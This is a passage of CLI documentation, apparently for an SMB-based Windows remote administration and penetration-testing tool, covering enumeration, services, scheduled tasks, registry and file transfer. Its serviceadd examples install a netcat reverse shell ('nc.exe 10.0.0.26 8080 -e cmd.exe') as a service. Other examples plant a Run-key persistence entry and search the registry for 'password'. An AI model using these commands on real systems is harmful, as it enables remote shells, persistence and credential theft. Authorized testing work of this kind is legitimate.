CLI Commands Documentation
April 13, 2026 ยท View on GitHub
use
Description: Connect to a specific share on the remote server
Help:
usage: use [-h] share
Connect to a specific share on the remote server
Example Usage:
Example Usage: use <sharename> | use C$
Arguments
share: Specify the share name to connect to- Required: Yes
ls
Description: List contents of a directory at a specified path. File paths with spaces must be entirely in quotes.
Help:
usage: ls [-h] [-s {name,size,created,lastaccess,lastwrite}] [--sort-reverse]
[-l] [-r depth] [-o filename] [--show] [--type {f,d,a}]
[path]
List contents of a directory at a specified path. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: ls /path/to/directory
ls --type f -l # List only files in long format
ls --type d # List only directories
ls --type f -r 2 # Recursively list only files to depth 2
Arguments
-
path: Path to list contents, defaults to current path- Default:
. - Required: No
- Default:
-
sort: Sort the directory contents by name, size, or date- Choices: name, size, created, lastaccess, lastwrite
- Default:
date - Required: No
-
recursive: Recursively list directory contents with X depth- Required: No
-
output: Save output to file- Required: No
-
type: Filter by type: f=files only, d=directories only, a=all- Choices: f, d, a
- Default:
a - Required: No
find
Description: Search for files and directories across the remote share with advanced filtering options.
Help:
usage: find [-h] [--path PATH] [--type {f,d,a}] [--size SIZE] [--mtime MTIME]
[--ctime CTIME] [--atime ATIME] [--regex] [--iname]
[--maxdepth MAXDEPTH] [--mindepth MINDEPTH] [--limit LIMIT]
[--sort {name,size,mtime,ctime,atime}] [--reverse]
[--format {table,list,paths,json}] [-o OUTPUT] [--empty]
[--hidden] [--progress] [--timeout TIMEOUT]
pattern
Search for files and directories across the remote share with advanced filtering options.
Example Usage:
Example Usage: find "*.txt" -path /Users -type f -size +1MB
Arguments
-
pattern: Search pattern (supports wildcards like *.txt or regex with -regex flag)- Required: Yes
-
path: Starting search path (default: current directory)- Default:
. - Required: No
- Default:
-
type: Search type: f=files only, d=directories only, a=all- Choices: f, d, a
- Default:
a - Required: No
-
size: File size filter: +1MB (larger than), -100KB (smaller than), =5GB (exactly)- Required: No
-
mtime: Modified within N days (positive number)- Required: No
-
ctime: Created within N days (positive number)- Required: No
-
atime: Accessed within N days (positive number)- Required: No
-
maxdepth: Maximum search depth- Default:
2 - Required: No
- Default:
-
mindepth: Minimum search depth- Default:
0 - Required: No
- Default:
-
limit: Maximum number of results to return- Required: No
-
sort: Sort results by field- Choices: name, size, mtime, ctime, atime
- Default:
name - Required: No
-
format: Output format- Choices: table, list, paths, json
- Default:
table - Required: No
-
output: Save results to file- Required: No
-
timeout: Search timeout in seconds- Default:
120 - Required: No
- Default:
shares
Description: List all shares available on the remote server
Help:
usage: shares [-h] [-l]
List all shares available on the remote server
Example Usage:
Example Usage: shares
enumshares
Description: List all shares available on the remote server
Help:
usage: shares [-h] [-l]
List all shares available on the remote server
Example Usage:
Example Usage: shares
enumpipes
Description: Enumerate named pipes on the remote server via IPC$ share and RPC endpoints. Preserves current share connection by default.
Help:
usage: enumpipes [-h] [--detailed] [--method {smb,rpc,hybrid}]
[--output filename]
Enumerate named pipes on the remote server via IPC$ share and RPC endpoints. Preserves current share connection by default.
Example Usage:
Example Usage: enumpipes --detailed --output pipes.txt
Arguments
-
method: Enumeration method to use- Choices: smb, rpc, hybrid
- Default:
hybrid - Required: No
-
output: Save output to specified file- Required: No
cat
Description: Display the contents of a specified file on the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: cat [-h] remote_path
Display the contents of a specified file on the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: cat /path/to/file
Arguments
remote_path: Specify the remote file path to display contents- Required: Yes
cd
Description: Change to a different directory on the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: cd [-h] [path]
Change to a different directory on the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: cd /path/to/directory
Arguments
path: Directory path to change to, defaults to current directory- Default:
. - Required: No
- Default:
pwd
Description: Print the current working directory on the remote server
Help:
usage: pwd [-h]
Print the current working directory on the remote server
Example Usage:
Example Usage: pwd
exit
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
quit
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
logout
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
logoff
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
clear
Description: Clear the screen
Help:
usage: clear [-h]
Clear the screen
Example Usage:
Example Usage: clear
help
Description: Display help information for the application
Help:
usage: help [-h] [--verbose] [cmd]
Display help information for the application
Example Usage:
Example Usage: help
Arguments
cmd: Specify a command to show help for- Required: No
reconnect
Description: Reconnect to the server to fix broken pipe or connection errors
Help:
usage: reconnect [-h]
Reconnect to the server to fix broken pipe or connection errors
Example Usage:
Use this command when you encounter '[Errno 32] Broken pipe' errors
who
Description: List the current sessions connected to the target host
Help:
usage: who [-h]
List the current sessions connected to the target host
Example Usage:
Example Usage: who
enumdisk
Description: Enumerate server disk information
Help:
usage: enumdisk [-h]
Enumerate server disk information
Example Usage:
Example Usage: enumdisk
enumlogons
Description: Enumerate users currently logged on the server
Help:
usage: enumlogons [-h]
Enumerate users currently logged on the server
Example Usage:
Example Usage: enumlogons
enuminfo
Description: Enumerate detailed information about the remote host
Help:
usage: enuminfo [-h]
Enumerate detailed information about the remote host
Example Usage:
Example Usage: enuminfo
enumsys
Description: Enumerate system information of the remote host
Help:
usage: enumsys [-h]
Enumerate system information of the remote host
Example Usage:
Example Usage: enumsys
enumtransport
Description: Enumerate transport information of the remote host
Help:
usage: enumtransport [-h]
Enumerate transport information of the remote host
Example Usage:
Example Usage: enumtransport
enumservices
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
filter: Filter services by name or state- Required: No
servicesenum
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
filter: Filter services by name or state- Required: No
svcenum
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
filter: Filter services by name or state- Required: No
services
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
filter: Filter services by name or state- Required: No
serviceshow
Description: Show details of a specific service on the remote server
Help:
usage: serviceshow [-h] (-i SERVICEID | service_name)
Show details of a specific service on the remote server
Example Usage:
Example Usage: serviceshow -i 123
Arguments
-
serviceid: Specify the ID of the service to show details for- Required: No
-
service_name: Specify the name of the service to show- Required: No
svcshow
Description: Show details of a specific service on the remote server
Help:
usage: serviceshow [-h] (-i SERVICEID | service_name)
Show details of a specific service on the remote server
Example Usage:
Example Usage: serviceshow -i 123
Arguments
-
serviceid: Specify the ID of the service to show details for- Required: No
-
service_name: Specify the name of the service to show- Required: No
showservice
Description: Show details of a specific service on the remote server
Help:
usage: serviceshow [-h] (-i SERVICEID | service_name)
Show details of a specific service on the remote server
Example Usage:
Example Usage: serviceshow -i 123
Arguments
-
serviceid: Specify the ID of the service to show details for- Required: No
-
service_name: Specify the name of the service to show- Required: No
servicestart
Description: Start a specified service on the remote server
Help:
usage: servicestart [-h] (-i SERVICEID | service_name)
Start a specified service on the remote server
Example Usage:
Example Usage: servicestart -i 123 OR svcstart Spooler
Arguments
-
serviceid: Specify the ID of the service to start- Required: No
-
service_name: Specify the name of the service to start- Required: No
svcstart
Description: Start a specified service on the remote server
Help:
usage: servicestart [-h] (-i SERVICEID | service_name)
Start a specified service on the remote server
Example Usage:
Example Usage: servicestart -i 123 OR svcstart Spooler
Arguments
-
serviceid: Specify the ID of the service to start- Required: No
-
service_name: Specify the name of the service to start- Required: No
servicerun
Description: Start a specified service on the remote server
Help:
usage: servicestart [-h] (-i SERVICEID | service_name)
Start a specified service on the remote server
Example Usage:
Example Usage: servicestart -i 123 OR svcstart Spooler
Arguments
-
serviceid: Specify the ID of the service to start- Required: No
-
service_name: Specify the name of the service to start- Required: No
servicestop
Description: Stop a specified service on the remote server
Help:
usage: servicestop [-h] (-i SERVICEID | service_name)
Stop a specified service on the remote server
Example Usage:
Example Usage: servicestop -i 123 OR svcstop Spooler
Arguments
-
serviceid: Specify the ID of the service to stop- Required: No
-
service_name: Specify the name of the service to stop- Required: No
svcstop
Description: Stop a specified service on the remote server
Help:
usage: servicestop [-h] (-i SERVICEID | service_name)
Stop a specified service on the remote server
Example Usage:
Example Usage: servicestop -i 123 OR svcstop Spooler
Arguments
-
serviceid: Specify the ID of the service to stop- Required: No
-
service_name: Specify the name of the service to stop- Required: No
serviceenable
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
-
serviceid: Specify the ID of the service to enable- Required: No
-
service_name: Specify the name of the service to enable- Required: No
svcenable
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
-
serviceid: Specify the ID of the service to enable- Required: No
-
service_name: Specify the name of the service to enable- Required: No
enableservice
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
-
serviceid: Specify the ID of the service to enable- Required: No
-
service_name: Specify the name of the service to enable- Required: No
enablesvc
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
-
serviceid: Specify the ID of the service to enable- Required: No
-
service_name: Specify the name of the service to enable- Required: No
servicedisable
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
-
serviceid: Specify the ID of the service to disable- Required: No
-
service_name: Specify the name of the service to disable- Required: No
svcdisable
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
-
serviceid: Specify the ID of the service to disable- Required: No
-
service_name: Specify the name of the service to disable- Required: No
disableservice
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
-
serviceid: Specify the ID of the service to disable- Required: No
-
service_name: Specify the name of the service to disable- Required: No
disablesvc
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
-
serviceid: Specify the ID of the service to disable- Required: No
-
service_name: Specify the name of the service to disable- Required: No
servicedel
Description: Delete a specified service on the remote server
Help:
usage: servicedel [-h] (-i SERVICEID | service_name)
Delete a specified service on the remote server
Example Usage:
Example Usage: servicedelete -i 123 OR svcdelete Spooler
Arguments
-
serviceid: Specify the ID of the service to delete- Required: No
-
service_name: Specify the name of the service to delete- Required: No
svcdelete
Description: Delete a specified service on the remote server
Help:
usage: servicedel [-h] (-i SERVICEID | service_name)
Delete a specified service on the remote server
Example Usage:
Example Usage: servicedelete -i 123 OR svcdelete Spooler
Arguments
-
serviceid: Specify the ID of the service to delete- Required: No
-
service_name: Specify the name of the service to delete- Required: No
servicedelete
Description: Delete a specified service on the remote server
Help:
usage: servicedel [-h] (-i SERVICEID | service_name)
Delete a specified service on the remote server
Example Usage:
Example Usage: servicedelete -i 123 OR svcdelete Spooler
Arguments
-
serviceid: Specify the ID of the service to delete- Required: No
-
service_name: Specify the name of the service to delete- Required: No
serviceadd
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
-
name: Specify the name of the new service- Required: Yes
-
binary_path: Specify the binary path of the new service- Required: Yes
-
display_name: Specify the display name of the new service- Required: Yes
-
start_type: Specify the start type of the new service- Choices: auto, demand, system
- Default:
demand - Required: Yes
svcadd
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
-
name: Specify the name of the new service- Required: Yes
-
binary_path: Specify the binary path of the new service- Required: Yes
-
display_name: Specify the display name of the new service- Required: Yes
-
start_type: Specify the start type of the new service- Choices: auto, demand, system
- Default:
demand - Required: Yes
servicecreate
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
-
name: Specify the name of the new service- Required: Yes
-
binary_path: Specify the binary path of the new service- Required: Yes
-
display_name: Specify the display name of the new service- Required: Yes
-
start_type: Specify the start type of the new service- Choices: auto, demand, system
- Default:
demand - Required: Yes
svccreate
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
-
name: Specify the name of the new service- Required: Yes
-
binary_path: Specify the binary path of the new service- Required: Yes
-
display_name: Specify the display name of the new service- Required: Yes
-
start_type: Specify the start type of the new service- Choices: auto, demand, system
- Default:
demand - Required: Yes
servicemodify
Description: Modify service binary path, display name, start type, or account
Help:
usage: servicemodify [-h] [--binary-path BINARY_PATH]
[--display-name DISPLAY_NAME]
[--start-type {auto,demand,disabled,system}]
[--account ACCOUNT] [--password PASSWORD]
[-i SERVICEID | service_name]
Modify service binary path, display name, start type, or account
Example Usage:
Examples:
servicemodify Spooler --start-type demand
servicemodify Spooler --binary-path "C:\\new\\path.exe" --display-name "New Name"
servicemodify -i 5 --account "NT AUTHORITY\\LocalService"
Arguments
-
serviceid: Specify the service ID- Required: No
-
service_name: Specify the service name- Required: No
-
binary_path: New binary path for the service- Required: No
-
display_name: New display name for the service- Required: No
-
start_type: New start type for the service- Choices: auto, demand, disabled, system
- Required: No
-
account: Account the service runs as on startup (e.g., LocalSystem, NT AUTHORITY\NetworkService, DOMAIN\user)- Required: No
-
password: Password for --account (required for domain/local users, not needed for built-in accounts like LocalSystem)- Required: No
svcmodify
Description: Modify service binary path, display name, start type, or account
Help:
usage: servicemodify [-h] [--binary-path BINARY_PATH]
[--display-name DISPLAY_NAME]
[--start-type {auto,demand,disabled,system}]
[--account ACCOUNT] [--password PASSWORD]
[-i SERVICEID | service_name]
Modify service binary path, display name, start type, or account
Example Usage:
Examples:
servicemodify Spooler --start-type demand
servicemodify Spooler --binary-path "C:\\new\\path.exe" --display-name "New Name"
servicemodify -i 5 --account "NT AUTHORITY\\LocalService"
Arguments
-
serviceid: Specify the service ID- Required: No
-
service_name: Specify the service name- Required: No
-
binary_path: New binary path for the service- Required: No
-
display_name: New display name for the service- Required: No
-
start_type: New start type for the service- Choices: auto, demand, disabled, system
- Required: No
-
account: Account the service runs as on startup (e.g., LocalSystem, NT AUTHORITY\NetworkService, DOMAIN\user)- Required: No
-
password: Password for --account (required for domain/local users, not needed for built-in accounts like LocalSystem)- Required: No
modifyservice
Description: Modify service binary path, display name, start type, or account
Help:
usage: servicemodify [-h] [--binary-path BINARY_PATH]
[--display-name DISPLAY_NAME]
[--start-type {auto,demand,disabled,system}]
[--account ACCOUNT] [--password PASSWORD]
[-i SERVICEID | service_name]
Modify service binary path, display name, start type, or account
Example Usage:
Examples:
servicemodify Spooler --start-type demand
servicemodify Spooler --binary-path "C:\\new\\path.exe" --display-name "New Name"
servicemodify -i 5 --account "NT AUTHORITY\\LocalService"
Arguments
-
serviceid: Specify the service ID- Required: No
-
service_name: Specify the service name- Required: No
-
binary_path: New binary path for the service- Required: No
-
display_name: New display name for the service- Required: No
-
start_type: New start type for the service- Choices: auto, demand, disabled, system
- Required: No
-
account: Account the service runs as on startup (e.g., LocalSystem, NT AUTHORITY\NetworkService, DOMAIN\user)- Required: No
-
password: Password for --account (required for domain/local users, not needed for built-in accounts like LocalSystem)- Required: No
enumtasks
Description: Enumerate scheduled tasks on the remote server
Help:
usage: enumtasks [-h] [-n] [--filter FILTER]
Enumerate scheduled tasks on the remote server
Example Usage:
Example Usage: enumtasks --filter name=Microsoft OR enumtasks --filter folder=Windows OR enumtasks -n
Arguments
filter: Filter tasks by name or folder- Required: No
tasksenum
Description: Enumerate scheduled tasks on the remote server
Help:
usage: enumtasks [-h] [-n] [--filter FILTER]
Enumerate scheduled tasks on the remote server
Example Usage:
Example Usage: enumtasks --filter name=Microsoft OR enumtasks --filter folder=Windows OR enumtasks -n
Arguments
filter: Filter tasks by name or folder- Required: No
taskenum
Description: Enumerate scheduled tasks on the remote server
Help:
usage: enumtasks [-h] [-n] [--filter FILTER]
Enumerate scheduled tasks on the remote server
Example Usage:
Example Usage: enumtasks --filter name=Microsoft OR enumtasks --filter folder=Windows OR enumtasks -n
Arguments
filter: Filter tasks by name or folder- Required: No
taskshow
Description: Show details of a specific task on the remote server
Help:
usage: taskshow [-h] (-i TASK_ID | task_path)
Show details of a specific task on the remote server
Example Usage:
Example Usage: tasksshow -i 123
Arguments
-
task_id: Specify the ID of the task to show- Required: No
-
task_path: Specify the full path of the task to show- Required: No
tasksshow
Description: Show details of a specific task on the remote server
Help:
usage: taskshow [-h] (-i TASK_ID | task_path)
Show details of a specific task on the remote server
Example Usage:
Example Usage: tasksshow -i 123
Arguments
-
task_id: Specify the ID of the task to show- Required: No
-
task_path: Specify the full path of the task to show- Required: No
showtask
Description: Show details of a specific task on the remote server
Help:
usage: taskshow [-h] (-i TASK_ID | task_path)
Show details of a specific task on the remote server
Example Usage:
Example Usage: tasksshow -i 123
Arguments
-
task_id: Specify the ID of the task to show- Required: No
-
task_path: Specify the full path of the task to show- Required: No
taskcreate
Description: Create a new scheduled task on the remote server
Help:
usage: taskcreate [-h] -n NAME -p PROGRAM [-a ARGUMENTS] [-f FOLDER]
[-i INTERVAL] [-d DATE]
Create a new scheduled task on the remote server
Example Usage:
Example Usage: taskcreate -n newtask -p cmd.exe -a '/c ipconfig /all > C:\test' -f \\Windows
Arguments
-
name: Specify the name of the new task- Required: Yes
-
program: Specify the program to run (cmd.exe)- Required: Yes
-
arguments: Specify the arguments to pass to the program- Required: No
-
folder: Specify the folder to create the task in- Default: ``
- Required: No
-
interval: Specify an interval in minutes to run the task- Required: No
-
date: Specify the date to start the task (2099-12-31 14:01:00)- Required: No
taskadd
Description: Create a new scheduled task on the remote server
Help:
usage: taskcreate [-h] -n NAME -p PROGRAM [-a ARGUMENTS] [-f FOLDER]
[-i INTERVAL] [-d DATE]
Create a new scheduled task on the remote server
Example Usage:
Example Usage: taskcreate -n newtask -p cmd.exe -a '/c ipconfig /all > C:\test' -f \\Windows
Arguments
-
name: Specify the name of the new task- Required: Yes
-
program: Specify the program to run (cmd.exe)- Required: Yes
-
arguments: Specify the arguments to pass to the program- Required: No
-
folder: Specify the folder to create the task in- Default: ``
- Required: No
-
interval: Specify an interval in minutes to run the task- Required: No
-
date: Specify the date to start the task (2099-12-31 14:01:00)- Required: No
taskimport
Description: Import a scheduled task from a local XML definition file
Help:
usage: taskimport [-h] -f FILE [-n NAME] [-d FOLDER] [--test] [--force]
Import a scheduled task from a local XML definition file
Example Usage:
Example Usage: taskimport -f task.xml --test | taskimport -f task.xml -n MyTask -d \\MyFolder
Arguments
-
file: Path to local XML task definition file- Required: Yes
-
name: Task name (extracted from XML URI if omitted)- Required: No
-
folder: Task Scheduler folder (default: root)- Default: ``
- Required: No
taskrun
Description: Run a specified task on the remote server
Help:
usage: taskrun [-h] task_path
Run a specified task on the remote server
Example Usage:
Example Usage: taskrun \\Windows\\newtask
Arguments
task_path: Specify the full path of the task to run- Required: Yes
taskexec
Description: Run a specified task on the remote server
Help:
usage: taskrun [-h] task_path
Run a specified task on the remote server
Example Usage:
Example Usage: taskrun \\Windows\\newtask
Arguments
task_path: Specify the full path of the task to run- Required: Yes
taskdelete
Description: Delete a specified task on the remote server
Help:
usage: taskdelete [-h] (-i TASK_ID | task_path)
Delete a specified task on the remote server
Example Usage:
Example Usage: taskdelete -i 123
Arguments
-
task_path: Specify the full path of the task to delete- Required: No
-
task_id: Specify the ID of the task to delete- Required: No
taskdel
Description: Delete a specified task on the remote server
Help:
usage: taskdelete [-h] (-i TASK_ID | task_path)
Delete a specified task on the remote server
Example Usage:
Example Usage: taskdelete -i 123
Arguments
-
task_path: Specify the full path of the task to delete- Required: No
-
task_id: Specify the ID of the task to delete- Required: No
taskrm
Description: Delete a specified task on the remote server
Help:
usage: taskdelete [-h] (-i TASK_ID | task_path)
Delete a specified task on the remote server
Example Usage:
Example Usage: taskdelete -i 123
Arguments
-
task_path: Specify the full path of the task to delete- Required: No
-
task_id: Specify the ID of the task to delete- Required: No
time
Description: Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Help:
usage: time [-h]
Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Example Usage:
Example Usage: time
enumtime
Description: Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Help:
usage: time [-h]
Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Example Usage:
Example Usage: time
servertime
Description: Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Help:
usage: time [-h]
Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Example Usage:
Example Usage: time
upload
Description: Upload a file to the remote server
Help:
usage: upload [-h] local_path [remote_path]
Upload a file to the remote server
Example Usage:
Example Usage: upload /local/path /remote/path
Arguments
-
local_path: Specify the local file path to upload- Required: Yes
-
remote_path: Specify the remote file path to upload to, optional- Required: No
put
Description: Upload a file to the remote server
Help:
usage: upload [-h] local_path [remote_path]
Upload a file to the remote server
Example Usage:
Example Usage: upload /local/path /remote/path
Arguments
-
local_path: Specify the local file path to upload- Required: Yes
-
remote_path: Specify the remote file path to upload to, optional- Required: No
download
Description: Download a file from the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: download [-h] [--resume] [--restart] [--chunk-size CHUNK_SIZE]
remote_path [local_path]
Download a file from the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: download /remote/path/to/file.txt /local/path/to/save/file.txt
Arguments
-
remote_path: Specify the remote file path to download- Required: Yes
-
local_path: Specify the local file path to download to, optional- Required: No
-
chunk_size: Chunk size for download (e.g., 64k, 1M, 512k)- Default:
64k - Required: No
- Default:
get
Description: Download a file from the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: download [-h] [--resume] [--restart] [--chunk-size CHUNK_SIZE]
remote_path [local_path]
Download a file from the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: download /remote/path/to/file.txt /local/path/to/save/file.txt
Arguments
-
remote_path: Specify the remote file path to download- Required: Yes
-
local_path: Specify the local file path to download to, optional- Required: No
-
chunk_size: Chunk size for download (e.g., 64k, 1M, 512k)- Default:
64k - Required: No
- Default:
mget
Description: Download all files from a specified directory and its subdirectories. File paths with spaces must be entirely in quotes.
Help:
usage: mget [-h] [-r] [-p regex] [-d D] [remote_path] [local_path]
Download all files from a specified directory and its subdirectories. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: mget /remote/path /local/path
Arguments
-
remote_path: Specify the remote directory path to download from- Required: No
-
local_path: Specify the local directory path where files will be downloaded- Required: No
-
p: Specify a regex pattern to match filenames- Required: No
-
d: Specify folder depth count for recursion- Default:
2 - Required: No
- Default:
mkdir
Description: Create a new directory on the remote server
Help:
usage: mkdir [-h] path
Create a new directory on the remote server
Example Usage:
Example Usage: mkdir /path/to/new/directory
Arguments
path: Specify the path of the directory to create- Required: Yes
rmdir
Description: Remove a directory on the remote server
Help:
usage: rmdir [-h] remote_path
Remove a directory on the remote server
Example Usage:
Example Usage: rmdir /path/to/remote/directory
Arguments
remote_path: Specify the remote path of the directory to remove- Required: Yes
rm
Description: Delete one or more files on the remote server
Help:
usage: rm [-h] [-n FILE_LIST] [remote_path]
Delete one or more files on the remote server
Example Usage:
Example Usage: rm file.txt, rm -n 'file1.txt file2.txt file3.txt'
Arguments
-
remote_path: Specify the remote file path to delete- Required: No
-
file_list: Space-separated list of files to delete (quoted)- Required: No
#shell
Description: Enter local terminal mode for command execution
Help:
usage: #shell [-h]
Enter local terminal mode for command execution
Example Usage:
Example Usage: #shell
!
Description: Run a specified local command
Help:
usage: ! [-h] ...
Run a specified local command
Example Usage:
Example Usage: ! ls -l
Arguments
commands: Specify the local commands to run- Required: No
info
Description: Display the status of the current session
Help:
usage: info [-h]
Display the status of the current session
Example Usage:
Example Usage: info
history
Description: Display recent command history from the slinger history file
Help:
usage: history [-h] [-n NUM] [--search TERM]
Display recent command history from the slinger history file
Example Usage:
Examples:
history # Show last 15 commands
history -n 50 # Show last 50 commands
history --search whoami # Search history for 'whoami'
history --search atexec -n 100 # Search last 100 entries for 'atexec'
!42 # Re-run command #42 from history
Tip: Press Ctrl+R for interactive reverse search while typing
Arguments
-
n: Number of history lines to display (default: 15)- Default:
15 - Required: No
- Default:
-
search: Search history for commands matching TERM- Required: No
reguse
Description: Connect to a remote registry on the remote server
Help:
usage: reguse [-h]
Connect to a remote registry on the remote server
Example Usage:
Example Usage: reguse
regstart
Description: Connect to a remote registry on the remote server
Help:
usage: reguse [-h]
Connect to a remote registry on the remote server
Example Usage:
Example Usage: reguse
regstop
Description: Disconnect from a remote registry on the remote server
Help:
usage: regstop [-h]
Disconnect from a remote registry on the remote server
Example Usage:
Example Usage: regstop
regquery
Description: Query a registry key on the remote server
Help:
usage: regquery [-h] [-l] [-v] key
Query a registry key on the remote server
Example Usage:
Example Usage: regquery HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run (You must use two slashes or quotes)
Arguments
key: Specify the registry key to query- Required: Yes
regset
Description: Set a registry value on the remote server
Help:
usage: regset [-h] -k KEY -v VALUE -d DATA [-t TYPE]
Set a registry value on the remote server
Example Usage:
Example Usage: regset -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v test -d "C:\test.exe"
Arguments
-
key: Specify the registry key to set- Required: Yes
-
value: Specify the registry value to set- Required: Yes
-
data: Specify the registry data to set- Required: Yes
-
type: Specify the registry type to set- Default:
REG_SZ - Required: No
- Default:
regdel
Description: Delete a registry value on the remote server
Help:
usage: regdel [-h] -k KEY [-v VALUE]
Delete a registry value on the remote server
Example Usage:
Example Usage: regdel -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v test
Arguments
-
key: Specify the registry key to delete- Required: Yes
-
value: Specify the registry value to delete- Required: No
regcreate
Description: Create a registry key on the remote server
Help:
usage: regcreate [-h] key
Create a registry key on the remote server
Example Usage:
Example Usage: regcreate -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\test
Arguments
key: Specify the registry key to create- Required: Yes
regcheck
Description: Check if a registry key exists on the remote server. This is really just an exposed helper function.
Help:
usage: regcheck [-h] key
Check if a registry key exists on the remote server. This is really just an exposed helper function.
Example Usage:
Example Usage: regcheck HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\test
Arguments
key: Specify the registry key to check- Required: Yes
regsearch
Description: Recursively search registry for keys and values matching a pattern
Help:
usage: regsearch [-h] [-k KEY] [--maxdepth MAXDEPTH] [--values]
[--limit LIMIT] [--format {table,json}]
pattern
Recursively search registry for keys and values matching a pattern
Example Usage:
Examples:
regsearch "Python" -k "HKLM\SOFTWARE"
regsearch "Spooler" -k "HKLM\SYSTEM\CurrentControlSet\Services" --values
regsearch "Run" -k "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion" --maxdepth 3
regsearch "password" -k "HKLM\SOFTWARE" --values --format json
Arguments
-
pattern: Search pattern (case-insensitive substring match)- Required: Yes
-
key: Root key to search from- Default:
HKLM\SOFTWARE - Required: No
- Default:
-
maxdepth: Maximum recursion depth- Default:
5 - Required: No
- Default:
-
limit: Maximum results to return- Default:
100 - Required: No
- Default:
-
format: Output format- Choices: table, json
- Default:
table - Required: No
portfwd
Description: Forward a local port to a remote port on the remote server
Help:
usage: portfwd [-h] (-d | -a | -l | -c | --load) local remote
Forward a local port to a remote port on the remote server
Example Usage:
Example Usage: portfwd (-a|-d) [lhost]:[lport] [rhost]:[rport]
Arguments
-
local: Specify the local host and port to forward from- Required: Yes
-
remote: Specify the remote host and port to forward to- Required: Yes
ifconfig
Description: Display network interfaces on the remote server
Help:
usage: ifconfig [-h]
Display network interfaces on the remote server
Example Usage:
Example Usage: ifconfig
ipconfig
Description: Display network interfaces on the remote server
Help:
usage: ifconfig [-h]
Display network interfaces on the remote server
Example Usage:
Example Usage: ifconfig
enuminterfaces
